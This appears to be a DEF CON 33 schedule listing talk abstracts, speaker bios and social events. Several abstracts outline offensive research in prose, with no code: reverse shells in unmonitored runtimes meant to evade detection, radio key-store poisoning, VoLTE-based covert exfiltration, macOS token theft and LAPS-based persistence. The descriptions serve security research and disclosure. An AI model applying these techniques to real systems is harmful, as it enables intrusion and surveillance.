SpeakerBio: Afonso Tinoco, Carnegie Mellon UniversityAfonso Tinoco is a PhD candidate currently on leave from Carnegie Mellon University and University of Lisbon. His research interests include Applied Cryptography and Distributed System Verification. He is a Co-Founder and a Research Engineer at Oblivious Labs, Inc. (https://obliviouslabs.com). Oblivious Lab’s mission is to develop open-source toolchains for Oblivious Computation (https://github.com/obliviouslabs/), with the goal of accelerating the wide deployment of Oblivious Computations. He is also a co-captain of STT (https://sectt.github.io/) , the CTF team of University of Lisbon.
- ics Calendar file
Traditional encrypted databases encrypt only the data contents but do not hide accesses to the data. Such accesses can leak highly sensitive information in practical applications like contact discovery, blockchains, and large language models. In this talk, Elaine Shi will describe what is oblivious computation, and how to construct simple and provably secure algorithms for oblivious computation. She will also cover the broad applications of oblivious computation including in Signal and Ethereum's (intended) use cases.
Speakers:Chelsea Button,Elaine Shi,Afonso TinocoChelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.
SpeakerBio: Elaine Shi, Professor at Carnegie Mellon UniversityElaine Shi is a professor in Carnegie Mellon University. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. She is a co-founder of Oblivious Labs, Inc. Her research on Oblivious RAM and differentially private algorithms have been adopted by Signal, Meta, and Google. She is a Packard Fellow, a Sloan Fellow, an ACM Fellow, and an IACR Fellow.
SpeakerBio: Afonso Tinoco, Carnegie Mellon UniversityAfonso Tinoco is a PhD candidate currently on leave from Carnegie Mellon University and University of Lisbon. His research interests include Applied Cryptography and Distributed System Verification. He is a Co-Founder and a Research Engineer at Oblivious Labs, Inc. (https://obliviouslabs.com). Oblivious Lab’s mission is to develop open-source toolchains for Oblivious Computation (https://github.com/obliviouslabs/), with the goal of accelerating the wide deployment of Oblivious Computations. He is also a co-captain of STT (https://sectt.github.io/) , the CTF team of University of Lisbon.
- ics Calendar file
Welcome to the resistance. As a new recruit in the Order of the White Tentacle, you must train to master the elements and restore balance to a world on the brink of chaos. This is a beginner & family-friendly adventure that will test your wisdom, bravery, and teamwork as you bend the elements to solve puzzles, complete missions, and rise through the ranks. Whether you walk the path of fire, water, earth, or air, only those who embrace the balance of all will prove themselves worthy. Will you answer the call and bring harmony to DEF CON 33?
Phone with a camera will be required to play.
No.
- ics Calendar file
Ever spotted someone from InfoSec in the wild and chickened out on saying hi? Yeah, us too. Come embrace the social awkwardness in a safe space where everyone's just as nervous as you are - but also just as excited to connect. We're gathering the chronically online, the terminally technical, and even the legend himself, Adam Shostack! Expect vibes, vibes, and maybe a little STRIDE talk. You in?
SpeakerBio: Adam Shostack
- ics Calendar file
Ever lurked InfoSec Twitter too long & now you're afraid to say hi to anyone in real life? Same.
But now's your moment: a whole room full of socially anxious hackers awkwardly saying hello—together. Come meet @PhillipWylie in the OWASP Community Room at DEFCON 33.
He's taught, mentored, written books, summoned entire curricula into existence, and somehow still answers emails. (Probably.)
Author of The Pentester BluePrint. Featured in Tribe of Hackers. Host of two podcasts. Actual nice human.
SpeakerBio: Phillip Wylie, Offensive Security MentorPhillip Wylie is a distinguished cybersecurity professional with over 27 years of combined IT and cybersecurity experience, including more than 21 years focused on information security. Specializing in offensive security with over a decade of hands-on experience, Phillip has extensive expertise in penetration testing, red team operations, and social engineering engagements, working both as a consultant and as an in-house pentester for enterprise organizations.
As a passionate educator, Phillip served as an Adjunct Instructor at Dallas College for over 3.5 years and has developed curricula for INE and P3F. He is the concept creator and co-author of The Pentester BluePrint: Starting a Career as an Ethical Hacker and was featured in Tribe of Hackers: Red Team. Phillip hosts two prominent cybersecurity podcasts: The Phillip Wylie Show and Simply Offensive.
Phillip is a sought-after conference speaker, hands-on workshop instructor, and dedicated mentor to cybersecurity professionals worldwide.
- ics Calendar file
Ever spotted someone from InfoSec Twitter in the wild and chickened out on saying hi? Yeah, us too. Come embrace the social awkwardness in a safe space where everyone's just as nervous as you are - but also just as excited to connect. We're gathering the chronically online, the terminally technical, and even the legend himself, @RayRedacted. Ray is dropping by for an hour, with special friends and presents, but he's gotta keep pace with an Olympian so gotta get there fast! <3
SpeakerBio: Ray [REDACTED], Producer at Darknet Diaries
- ics Calendar file
This walk-in workshop is a choose-your-own-adventure with modules that takes you on a journey from "I have no idea what this CSV is telling me" to "I just built an AI model that actually solved my problem." Through hands-on exercises that mirror real-world security mayhem, you'll discover when a simple pivot table beats a neural network, and when GenAI is your secret weapon instead of an expensive overkill.
You'll wrangle messy data, uncover hidden patterns, and build tools that make Monday mornings less painful. We'll show you the wins AND the spectacular failures—because knowing when NOT to use AI is just as valuable as knowing when to unleash it. This isn't about becoming a data scientist overnight; it's about becoming the analyst who knows exactly which tool to grab when the SOC is on fire.
Walk out with practical skills, battle-tested techniques, and the confidence to turn your security problems into data solutions. No math degree required—just bring your curiosity and your most annoying security challenges.
Speakers:Jessie "Ringer" Jamieson,Preeti RavindraJessie Jamieson, aka "Ringer", is a mathematician who loves using math to solve hard problems, but she loves helping others see the beauty and value of math even more! She has been invited to speak at mathematics and cybersecurity events about supply chain and AI-related risk, and has spoken internationally on the importance of data science maturity for cybersecurity effectiveness. Jamieson holds a PhD and a MS in Mathematics from the University of Nebraska - Lincoln, where she was a National Science Foundation Graduate Research Fellow. Jamieson has also held senior research roles at Tenable and the Johns Hopkins University Applied Physics Laboratory. She currently works in a role related to cybersecurity risk quantification. When not doing math, she's usually playing volleyball or video games, playing soccer with her dog, Dax, or traveling to some of her favorite cybersecurity conferences (like DEFCON!).
SpeakerBio: Preeti RavindraPreeti is a technical leader in AI and security creating security outcomes. She has experience working on enterprise security teams, security SaaS vendors and services ranging from startups to Fortune 100 companies. Her value proposition is cutting through ambiguity and working cross-functionally with engineering, product, security and legal teams to drive business value. Preeti is currently building out a program to proactively secure AI and mitigate AI risks as the founding member of her team.
Her research areas include AI applications in security, security and safety of AI systems. A recognized voice in the industry, Preeti is a speaker at leading security conferences like BSides and serves on program committees of AI and security conferences like CAMLIS, WiCyS, Executive Women’s Forum. She is passionate about building collaborations between AI and security communities and mentoring security practitioners to advance into senior roles.
- ics Calendar file
For years, Pentestmonkey Reverse Shell Cheat Sheet defined the essentials of post-exploitation. Bash, Python, PHP, (G)Awk, Netcat and others were quick, simple and highly effective tools for gaining shell access. Today, those tools are the first to be flagged, restricted or removed. In real-world hardened environments, the old paths are closed. Meanwhile, new runtimes like Clojure, Racket, NATS-IO, Bun, Crystal, Red Language, Ballerina and others are becoming part of production environments, CI/CD pipelines and internal developer ecosystems, usually without security teams treating them as risks.
This workshop focuses on building practical, working reverse and bind shells using these modern runtimes. Participants will write their own payloads, test them live against targets and leave with working knowledge of how to survive without traditional tooling. Every shell demonstrated will be integrated into the Metasploit Framework with custom modules built for each runtime. Source code, victim and attacker virtual machines and pre-built environments will be provided to ensure every participant can practice during the session.
This is not a theory-heavy workshop. It is about operational survival when Python is gone, Netcat is restricted and standard shells are no longer viable. It is about turning runtimes that defenders ignore into reliable offensive footholds. Attendees will leave with ready-to-use payloads, working Metasploit extensions, and the technical knowledge to adapt to modern detection-heavy environments.
SpeakerBio: Roberto SoaresWith more than 10 years immersed in Information Security, he is an Information Security Engineer specializing in Red Team. His focus extends to best practices, encompassing application and infrastructure vulnerability assessments, code reviews, and a mix of static and dynamic analyzes to identify vulnerabilities. In addition to his main focus, he has a strong inclination to develop offensive tools. He has contributed more than 25 modules to the core Metasploit framework and registered several CVEs. Additionally, his knowledge covers the complex landscape of macOS security. His curiosity leads him to test non-trivial scenarios, from analyzing cranes that operate containers on ships, to delving into the complexities of embedded systems (SCADA/PLC) and executing advanced attacks on computer networks, that is, his hacker spirit runs through his veins. . He really enjoys breaking and fixing things that contain bits and bytes.
- ics Calendar file
Encrypted radios promise off-grid privacy and security, but what if their core trust anchors can be broken with one message? Our latest research shows that a single, unauthenticated RF packet can overwrite any public keys goTenna Pro stores for peer-to-peer and group chats, silently substituting attacker-controlled keys so that every AES-256 encrypted message is now readable only to the attacker, not the intended recipient; by repeating the swap on both ends the attacker becomes an undetectable man-in-the-middle who alone can forward, alter, or drop traffic, leaving victims blind to compromise. We will live-demo three outcomes: pulling teams into GPS dead zones by injecting phantom coordinates; impersonating a surveillance teammate to feed disinformation and fracture cohesion; and detonating a network-wide blackout that forces operators onto weaker radio communication that allows easy direction-finding. The audience will watch us craft the packet, poison key stores, pivot between victims, and restore normalcy - all from commodity SDR hardware and open-source code released at the session. We close with a hardening guidance and a patch in goTenna Pro version 2.0.3 (CVE-2024-47130) proving once again that cryptography is only as strong as the key lifecycle surrounding it.
Speakers:Erwin "Dollarhyde" Karincic,WoodyErwin is an experienced security researcher specializing in both hardware and software reverse engineering, binary analysis, and exploit development across a range of processor architectures. He has notable experience in implementing complex Radio Frequency (RF) waveforms using Software Defined Radios (SDRs) for cybersecurity applications, complemented by his proficiency in designing, simulating, and fabricating antennas tailored for such applications. His past work includes extensive TCP/IP networking experience, designing worldwide secure communication systems. Erwin holds a number of prestigious certifications, including OSCP, OSCE, OSWE, OSEE, and CCIE Enterprise Infrastructure. Erwin is also a staff member in the RF Hacker Sanctuary and a member of Security Tribe.
SpeakerBio: WoodyWoody thinks Linux is a member of the Charlie Brown gang who can lift heavy things but not always spell them. He has had some success with RF exploits in the past with the first ever goTenna exploit talk in the RF wireless village as well as the first attack against Ford Raptor key fobs with RaptorCaptor exploit. Woody’s unique background, familiar to some, gives him a creative aspect to the impact of goTenna Pro research in the physical and RF world. Woody is also a staff member in the RFHacker Sanctuary, a member of Security Tribe, and has appeared on a few episodes of Hak5 describing novel device attacks.
- ics Calendar file
In this talk we present a collection of attacks against the most widely used EV charging protocol, by exploiting flaws in the underlying power-line communication technologies affecting almost all EVs and chargers.
Specifically, we target the QCA 7000 Homeplug modem series, used by the two most popular EV charging systems, CCS and NACS.
We demonstrate multiple new vulnerabilities in the modems, enabling persistent denial of service.
To better understand the scope of these issues, we conduct a study of EV chargers and vehicles, and show widespread insecurities in existing deployments.
We show a variety of practical real-world scenarios where the HomePlug link can be used to hijack EV charging communications, even at a distance.
Finally, we present results from reverse engineering the firmware and how we can gain code execution.
References:
Marcell Szakály is a PhD student in the Systems Security Lab at the University of Oxford. His research focuses on the security of the EV charging infrastructure. He received his masters degree in Physics, and worked on superconducting magnet design. His work now involves RF hardware, SDRs, and digital electronics.
SpeakerBio: Jan "SP3ZN45" BerensJan Berens aka SP3ZN45 has been a goon in the QM department for several years now and is working full time as a redteamer at alpitronic SLR the leading manufacturer for DC chargers in Europe. His background is security consulting and penetration testing for critical infrastructures and industrial installations in Europe. Doing mostly non publicly disclosed security research and mentoring of beginners in the security domain.
- ics Calendar file
In this talk we present a collection of attacks against the most widely used EV charging protocol, by exploiting flaws in the underlying power-line communication technologies affecting almost all EVs and chargers.
Specifically, we target the QCA 7000 Homeplug modem series, used by the two most popular EV charging systems, CCS and NACS.
We demonstrate multiple new vulnerabilities in the modems, enabling persistent denial of service.
To better understand the scope of these issues, we conduct a study of EV chargers and vehicles, and show widespread insecurities in existing deployments.
We show a variety of practical real-world scenarios where the HomePlug link can be used to hijack EV charging communications, even at a distance.
Finally, we present results from reverse engineering the firmware and how we can gain code execution.
Speakers:Marcell Szakály,Sebastian Köhler,Jan "SP3ZN45" BerensMarcell Szakály is a PhD student in the Systems Security Lab at the University of Oxford. His research focuses on the security of the EV charging infrastructure. He received his masters degree in Physics, and worked on superconducting magnet design. His work now involves RF hardware, SDRs, and digital electronics.
SpeakerBio: Sebastian KöhlerPrevious speaker at CarHackingVillage 2023, Redeploying the Same Vulnerabilities: Exploiting Wireless Side-Channels in Electric Vehicle Charging Protocols
SpeakerBio: Jan "SP3ZN45" BerensJan Berens aka SP3ZN45 has been a goon in the QM department for several years now and is working full time as a redteamer at alpitronic SLR the leading manufacturer for DC chargers in Europe. His background is security consulting and penetration testing for critical infrastructures and industrial installations in Europe. Doing mostly non publicly disclosed security research and mentoring of beginners in the security domain.
- ics Calendar file
How VoLTE and IMS — the backbone of modern telecom voice services — can be weaponized by malware to perform stealthy, operator-blind surveillance, data exfiltration, and persistent command-and-control (C2), all without using the public internet. how a VoLTE-enabled Android device can be turned into a covert surveillance node—no SIM or live network required. Using a rooted emulator (for safe, repeatable testing) and Frida hooks, attendees will watch malware silently hijack the IMS stack, launch SIP INVITE/OPTIONS beacons to a Kamailio-based fake IMS core, and exfiltrate SMS, location, eSIM data or live audio over RTP—all traffic appearing as legitimate VoLTE signaling inside telecom infrastructure. The exercise proves how nation-grade implants can live entirely inside operator voice channels, bypassing traditional firewalls and DPI.
SpeakerBio: Vinod Shrimali
- ics Calendar file
Kick off your DEF CON morning with a creative reset. Open Source Art is adult coloring time but hacker-style. Choose from privacy and security themed coloring pages and bring them to life with markers, crayons, and your own flair. Whether you're decompressing or collaborating on a shared poster, it's the perfect low-pressure space to connect, reflect, and color outside the lines.
- ics Calendar file
Rayhunter is an open source tool published by the Electronic Freedom Foundation which uses an Orbic RC400L mobile hotspot to detect potentially malicious cellular network data that may indicate a Stingray attack. In this presentation, we review the use of open sourced software cellular base stations such Open Air Interface 5G (OAI), srsRAN_4G, OpenBTS, and Yates GSM to create cellular test beds to robustly test the Rayhunter device and develop new detection capabilities.
SpeakerBio: Ron BrobergRon Broberg hacks drones, phones, and medical devices for Dark Wolf Solutions. Previously, he fuzzed NASA flight software and poked around satellite systems at Lockheed Martin.
- ics Calendar file
As a collaborator with DARPA on the AI Cyber Challenge, OpenAI has advanced AI powered security research. Members of our team will be present to hear your ideas, share insights into our team, and discuss our involvement in AIxCC!
Speakers:Ian Brelinsky,Matthew Knight,Kristen Chu,Dave Aitel,Greg Harper,Mike Hunter
- ics Calendar file
- ics Calendar file
A cross-border health emergency is spreading fast and you’re on the front lines of the response. Hospitals are overwhelmed. ICU beds are full. Strange symptoms are emerging in a tight geographic cluster across southern Germany and eastern France. Supply chains are buckling, communications are failing, and trust in public health institutions is unraveling. At the Biohacking Village during DEF CON 33, Operation Europa Crisis invites you to join a gripping, real-time tabletop challenge. 🧠 Step Into the Crisis Take on roles such as: Hospital administrators Health ministry officials Crisis communication leads Frontline clinical staff Supply chain and logistics coordinators CBRN and incident response team Together, you'll investigate the cause, coordinate international response efforts, manage conflicting narratives, and navigate critical decisions in a high-pressure environment.
SpeakerBio: Nathan Case, CSO at ClarityNathan Case is a cybersecurity engineer and strategist with over two decades of experience defending critical infrastructure, building secure cloud systems, and leading incident response at the highest levels. His career spans roles at Amazon Web Services, McKesson, and defense-focused startups, where he has architected platforms for healthcare, government, and national security missions. Known for his ability to bridge technical depth with real-world impact, Nathan has led global security teams, supported cyber operations across multiple countries, and advised both enterprise executives and government leaders on risk, resilience, and transformation.
- ics Calendar file
🚨 Horizon Veil Enters Phase Three: The Hospital Crisis Simulation Begins
The Scenario:
As the dust settles from the initial detonations political, radiological, and digital the next phase of the Horizon Veil simulation begins.
The final 10 turns shift the spotlight to southern Germany and France, where hospital systems are reaching their breaking point. Overwhelmed by radiation casualties, cyber-disrupted logistics, and mounting refugee pressure, medical centers from Munich to Marseille are facing impossible choices. Triage under disinformation. Staffing collapses under threat of digital sabotage. International aid is tangled in red tape and mistrust.
This phase will test what happens when the healthcare system becomes the final line of civilizational defense and what it means to govern when basic survival is no longer guaranteed.
If you've been following the earlier turns, this is where the long tail of your policy decisions lands with patients on the floor and nowhere left to go.
🔎 Why Participate?
✳️ No Experience Needed
Whether you're a seasoned responder or a curious newcomer, this experience is designed to challenge your instincts, engage your problem-solving skills, and immerse you in a suspenseful and evolving situation. All backgrounds welcome.
📍 Event Details
Nathan Case is a cybersecurity engineer and strategist with over two decades of experience defending critical infrastructure, building secure cloud systems, and leading incident response at the highest levels. His career spans roles at Amazon Web Services, McKesson, and defense-focused startups, where he has architected platforms for healthcare, government, and national security missions. Known for his ability to bridge technical depth with real-world impact, Nathan has led global security teams, supported cyber operations across multiple countries, and advised both enterprise executives and government leaders on risk, resilience, and transformation.
- ics Calendar file
We’re trying to debug the end of the world through trial and error — mostly error. In the middle of a worsening climate crisis, outdated OT protocols like Modbus are being exploited by state-sponsored actors in ways that turn environmental infrastructure into geopolitical weapons. From hijacked dams running Windows 95-era code to smart thermostats recruited into botnets fighting over Arctic oil, the climate-tech battlefield is already here.
This session dives into how APTs are quietly compromising the systems designed to save the planet. We’ll examine real-world campaigns where threat actors have targeted energy grids, carbon capture labs, and EV infrastructure — and how climate action is being derailed by 1970s-era code and modern apathy.
This is Cyber Threat Intelligence meets Climate Fiction (Cli-Fi). It’s weird, terrifying, and very real.
SpeakerBio: Cybelle Oliveira, Cyber Threat Intelligence Researcher at MalwarelandiaCybelle Oliveira is a Cyber Threat Intelligence researcher and a Master’s student in Cyber Intelligence. She teaches in a postgraduate CTI specialization program in Brazil and is the co-founder of La Villa Hacker — the first DEF CON village dedicated to the Portuguese and Spanish-speaking community.
Cybelle has spoken at some of the world’s leading security conferences, including DEF CON, BSides Las Vegas/São Paulo/Rio de Janeiro, 8.8 Chile, Cryptorave, Radical Networks, Mozilla Festival, and many others. Her work often explores the intersection of cyber threats, geopolitics, and underreported regions, with a particular interest in the strange, obscure, and catastrophically messy corners of cybersecurity.
Cybelle Oliveira es Consultora de Ciberseguridad, postgraduada en Cyber Threat Intelligence y estudiante de Máster en Ciberinteligencia en el Campus Internacional de Ciberseguridad de la Universidad de Murcia, España. Ha estado involucrada en activismo de privacidad y seguridad durante más de 10 años y ha presentado charlas en eventos por todo el mundo, como BSides LV, BSides SP, Girls Hack Village (DefCon), 8.8 Chile, Internet Freedom Festival, Radical Networks, Mozilla Festival, Roadsec, Cryptorave, entre otros. Cybelle forma parte de la comunidad Mozilla y es directora de la organización Casa Hacker.
- ics Calendar file
While the theft of Primary Refresh Token (PRT) cookies on Windows has been extensively studied, similar attacks on macOS remain unexplored. As organizations increasingly use Microsoft Intune to manage both Windows and macOS devices, a critical question arises: can attackers also extract PRT cookies from macOS?
In this talk, we present our research into Microsoft’s SSO implementation within the Intune Company Portal for macOS. We compare authentication flows and security controls between Windows and macOS, exposing weaknesses that allow attackers to bypass process validation and obtain authentication tokens under certain conditions.
Another obstacle for attackers has been Microsoft’s efforts to make it more difficult to register new devices using stolen credentials for persistence. Our research introduces a novel technique: once an attacker acquires a token with an MFA claim on the device, they can still register new devices and generate new tokens without concern for the original stolen token’s expiration.
We will demonstrate PRT Cookie extraction on macOS and release a proof-of-concept tool, showing not only how credential theft techniques can now extend beyond Windows to macOS environments, but also how attackers can leverage these techniques for long-term persistence.
References:
Shang-De Jiang is a deputy director of the research team of CyCraft. Currently, he focuses on research on Incident Response and Endpoint Security and Microsoft Security. He has presented technical presentations in non-academic technical conferences, such as TROOPERS, HITB, HITCON, CodeBlue, Blue Team Summit and BlackHat USA. He is the co-founder of UCCU Hacker the private hacker group in Taiwan.
SpeakerBio: Dong-Yi "Kazma Ye" YeKazma is a university student from Taiwan and cybersecurity intern of CyCraft. His current work focuses on how Microsoft Entra ID integrates and behaves on macOS, diving deep into binary internals and real-world authentication logic. He’s also a CTF player with the B33F 50UP team, with a passion for reverse engineering and binary exploitation.
SpeakerBio: Tung-Lin "Echo Lee" LeeEcho is a cybersecurity researcher at CyCraft Technology, specializing in network and cloud security. He has presented at industry conferences, including DEVCORECONF, HITCON ENT, ROOTCON, InfoSec Taiwan, and CyberSec.
- ics Calendar file
Everything you need to know about OSINT
SpeakerBio: Mishaal Khan, Privacy ExpertMishaal is a subject matter expert in cybersecurity, pentesting, privacy, Open Source Intelligence and social engineering and a frequent speaker on these topics at Universities and popular cybersecurity conferences like DEF CON, Black Hat, Wild West Hackin Fest, TEDx, and multiple BSides Security events.
Mishaal has worked with multinational companies for over 20 years, securing their networks and providing executive level consultancy as a CISO to manage risk and avoid breaches. He's the author of the book; The Phantom CISO, runs a cybersecurity practice as a vCISO and owns a privacy management and investigations firm.
- ics Calendar file
As AI accelerates the creation and spread of synthetic media, the disinformation threat landscape is evolving. From deepfaked political speeches to fabricated news sites, the weaponization of AI is eroding public trust in truth itself. This talk explores how OSINT offers a verifiable countermeasure to AI-driven falsehoods to detect, investigate, and debunk AI-generated content in the wild. Whether you’re an analyst or simply trying to protect the signal from the noise, this session will equip you to challenge synthetic narratives with verifiable evidence. In the age of artificial deception, OSINT is not just a tool set—it’s a digital duty. It takes all of us to verify the truth.
SpeakerBio: Zoey SelmanZoey Selman, known in the community as V3rbaal, is a Threat Intelligence Analyst on Recorded Future's Insikt Group and specializes in APT research. She is a Co-Lead of DEF CON Demo Labs, the Founding Director of DEF CON's Blue Team Village, and the former Director of Trace Labs.
- ics Calendar file
Local Administrator Password Solution (LAPS) automates local admin password rotation and secure storage in Active Directory (AD) or Microsoft Entra ID. It ensures that each system has a unique and strong password.
In OverLAPS: Overriding LAPS Logic, we will revisit and extend our previous research (Malicious use of "Local Administrator Password Solution", Hack.lu 2017) by exposing client-side attacks in Windows LAPS ("LAPSv2"). After a brief overview of LAPS's evolution, from clear-text fields in AD with Microsoft LAPS ("LAPSv1") to encrypted AD attributes or Entra ID storage with Windows LAPS, we will explore the client-side logic of Windows LAPS. Unlike prior work that exfiltrates passwords only after directory compromise, we will focus on abusing LAPS to maintain presence on compromised endpoints, both on-prem and Entra-joined devices.
We will leverage PDB symbols and light static analysis to understand how LAPS works internally, then use Frida for dynamic hooking to capture, manipulate, and rotate admin passwords on demand. We will also reproduce Frida proof-of-concepts using Microsoft Detours for in-process hooks.
Attendees will gain practical insights into new attack vectors against Windows LAPS, enabling them to assess, reproduce, and defend against client-side attacks in their own environments.
References:
Antoine Goichot is a French cybersecurity professional and Ethical Hacker working in Luxembourg. With ten years of hands-on experience and some certifications (CRTO/CRTL, GPEN/GXPN, GDAT), he has been into hacking since junior high school. He was always trying to find clever ways to solve technical problems and tweak his computer. In high school, he jailbroke a dozen PSPs so friends could play homebrew games between classes. He later studied computer science and networks at TELECOM Nancy. Now as Senior Manager at PwC Luxembourg, Antoine leads projects for a large variety of clients including major corporations, banks, European institutions, and insurance companies. Beyond his day job, he has uncovered several vulnerabilities in Windows VPN clients, Cisco AnyConnect (CVE-2020-3433/3434/3435, CVE-2020-27123, CVE-2021-1427) and Ivanti Secure Access (CVE-2023-38042). These issues have been fixed by vendors after coordinated disclosure. Antoine has contributed to the cybersecurity community through a conference paper co-authored during his studies, blog posts, articles in the MISC magazine (French periodical), etc. He also co-presented at Hack.lu in October 2017 on "Malicious use of 'Local Administrator Password Solution'"
- ics Calendar file
Come play the debut challenge from Hack the Box featuring the OWASP Top 10. Visit the OWASP space to access or to find a friend / team!
- ics Calendar file
Use machine learning with Python to detect attacks in network packets including DNS tunneling, FTP brute force, and HTTP scanning. We will be using various Python tools such as iPython notebooks, scapy, and scikit-learn. Some Python experience is recommended, but if you don’t know Python, come prepared to start with our Python tutorial!
- ics Calendar file
Looking to upgrade your skills or see how you would fare in Capture The Packet? Come check out what Packet Detective has to offer! A step up in difficulty from Packet Inspector, Packet Detective will put your network hunting abilities to the test with real-world scenarios at the intermediate level. Take the next step in your journey towards network mastery in a friendly environment still focused on learning and take another step closer to preparing yourself for the competitive environment of Capture The Packet
- ics Calendar file
We are the home of WosDJCo, a group of DJ’s and hackers who love to spin for your hacking pleasure. The Packet Hacking Village makes sure to have music non stop during the event by some of your favorite DJ’s.
SpeakerBio: AthlexA prismatic glint of light in a dark room from an indistinct source.
- ics Calendar file
We are the home of WosDJCo, a group of DJ’s and hackers who love to spin for your hacking pleasure. The Packet Hacking Village makes sure to have music non stop during the event by some of your favorite DJ’s.
SpeakerBio: n0pslideGlobe-trotting DJ, DJ Name, has made a name for himself/herself by igniting dance floors across the world. He/She has a knack for seamlessly blending diverse musical genres, creating an electrifying atmosphere that transcends borders and language barriers. With a deep passion for music and an unwavering commitment to pushing the limits, DJ Name is a true pioneer in the international DJ scene
- ics Calendar file
We are the home of WosDJCo, a group of DJ’s and hackers who love to spin for your hacking pleasure. The Packet Hacking Village makes sure to have music non stop during the event by some of your favorite DJ’s.
SpeakerBio: mattrixmattrix is a DJ in the Los Angeles area. He started DJing at hacker events such as Toorcon, ShellCon and DEFCON. mattrix has DJ’d at the Linq Pool and other night clubs and bars. mattrix prefers Tech House and Open Format DJ genres but can perform within a wide range of genres.
- ics Calendar file
We are the home of WosDJCo, a group of DJ’s and hackers who love to spin for your hacking pleasure. The Packet Hacking Village makes sure to have music non stop during the event by some of your favorite DJ’s.
SpeakerBio: Icetre NormalIcetre is an ancient elder who’s been wandering the defcon grounds since before the fountains turned purple. He generally plays bass and tech house, but being open format anything is open game
- ics Calendar file
We are the home of WosDJCo, a group of DJ’s and hackers who love to spin for your hacking pleasure. The Packet Hacking Village makes sure to have music non stop during the event by some of your favorite DJ’s.
SpeakerBio: Ap0ll0Straight from Brazil, Ap0ll0 delivers an electrifying fusion of tech house, deep house, and brazilian bass, enriched with signature Brazilian rhythms.
- ics Calendar file
We are the home of WosDJCo, a group of DJ’s and hackers who love to spin for your hacking pleasure. The Packet Hacking Village makes sure to have music non stop during the event by some of your favorite DJ’s.
SpeakerBio: Ap0ll0Straight from Brazil, Ap0ll0 delivers an electrifying fusion of tech house, deep house, and brazilian bass, enriched with signature Brazilian rhythms.
- ics Calendar file
We are the home of WosDJCo, a group of DJ’s and hackers who love to spin for your hacking pleasure. The Packet Hacking Village makes sure to have music non stop during the event by some of your favorite DJ’s.
SpeakerBio: FunktribeJoey Muniz began his DJ career in 1995 in Tampa, Florida, showcasing a versatile range of genres including house, techno, downtempo, and hip-hop, tailored to each event’s vibe. Over the past 20+ years, Joey has secured numerous DJ residencies across the United States. A purist at heart, Joey is among the select few DJs who embrace the classic art of turntablism.
- ics Calendar file
We are the home of WosDJCo, a group of DJ’s and hackers who love to spin for your hacking pleasure. The Packet Hacking Village makes sure to have music non stop during the event by some of your favorite DJ’s.
SpeakerBio: FunktribeJoey Muniz began his DJ career in 1995 in Tampa, Florida, showcasing a versatile range of genres including house, techno, downtempo, and hip-hop, tailored to each event’s vibe. Over the past 20+ years, Joey has secured numerous DJ residencies across the United States. A purist at heart, Joey is among the select few DJs who embrace the classic art of turntablism.
- ics Calendar file
The perfect introduction to network analysis, sniffing, and forensics. Do you want to understand the techniques people use to tap into a network, steal passwords and listen to conversations? Packet Inspector is the place to develop these skills! For well over a decade, the Wall of Sheep has shown people how important it is to use end-to-end encryption to keep sensitive information like passwords private. Using a license of the world famous Capture The Packet engine from Aries Security, we have created a unique way to teach hands-on skills in a controlled real-time environment.
- ics Calendar file
- ics Calendar file
This project is an open source hardware powered air-purifying respirator designed for use as personal protective equipment, offering N100-level filtration against airborne threats including pathogens and particulates, developed by Tetra Bio Distributed. We will demo the PAPR and discuss how to hack together your own using 3D-printed and off-the-shelf components, source one yourself, or contribute to the project.
Speakers:Sean Marquez,Melanie "Goldfishlaser" AllenSean has a B.S. degree in mechanical engineering, specializing in design of mechanical systems, from the University of Irvine, California. He is currently studying permaculture design. He worked as an associate mechanical design engineer for Max Q Systems, formerly an original equipment manufacturer for the aerospace industry. He served as the GreenHab officer at the Mars Desert Research Station. He is also a contributor for the Open Source Hardware Association open standards working group, Tetra Bio Distributed developing open-source hardware medical and PPE devices, and the Mach 30 Foundation developing the distributed open-source hardware framework.
SpeakerBio: Melanie "Goldfishlaser" AllenMelanie is a technical writer and open hardware developer. At DEF CON 32, she presented the Open Hardware Design for BusKill Cord demo lab, inviting participation in the 3D-printed dead man's switch project. She continues to contribute to open hardware and software initiatives that promote digital security and public accessibility. Learn more at mnallen.net.
- ics Calendar file
In this talk we want to dive deep into the world of direct TPMS. These systems are used by a great portion of the cars today, and typically send information about a car’s tires wirelessly without any encryption or authentication. We show that it is feasible to capture these signals with very low cost hardware to build a tracking infrastructure. We present as well a tool that allows us to create custom TPMS messages and spoof the ECU of different cars.
SpeakerBio: Yago Lizarribar
- ics Calendar file
Follow real world password attack steps against a mock target in order to better understand how to protect yourself and improve the security of your passwords!
- ics Calendar file
When vulnerabilities are disclosed, security teams face the task of developing exploits to identify compromised assets. Public exploits aren’t always available, which is why teams scroll through hundreds of patches to identify the relevant one. Traditional methods like grepping might fasten the process, but mostly come out ineffective against modern codebases where context-aware analysis is required. We present PatchLeaks tool that transforms the messy patch analysis process into efficient vulnerability discovery. Unlike regex-based static analysis tools, it locates relevant patches with vulnerable code based on CVE id only, doesn’t require any rules, has ability to identify logical vulnerabilities, and analyzes even corrupt files.
Speakers:Huseyn "Khatai" Gadashov,Abdulla "Abu" AbdullayevHuseyn is a web application security specialist whose experience includes security roles at multiple financial institutions where he conducted web penetration testing, vulnerability assessments, and developed exploit automation tools. In his free time, he analyzes security patches to craft private exploits and uses them in his technical publications. Using his offensive security experience, he explores how machine learning can revolutionize the identification of hidden vulnerabilities within security patches.
SpeakerBio: Abdulla "Abu" AbdullayevAbdulla Abdullayev (Abu) is a cybersecurity leader with over 11 years of experience across finance, government, and startups. He specializes in offensive and defensive security, security architecture, and building high-performing information security teams.
Certified in OSEP, OSWE, OSCP, WCSD, and CEH, Abu is currently a Sr. Security Researcher at Oryxlabs, focusing on security architecture and vulnerability research. He received M.S. degree in Cyber Security from University of Birmingham, UK, in 2016. Abu is a frequent speaker at major security conferences, including Black Hat and CyberWeek, among others.
Experienced in penetration testing, security architecture, security research, offensive&defensive security, incident response, red teaming, identifying zero-day vulnerabilities, and agile methodologies.
- ics Calendar file
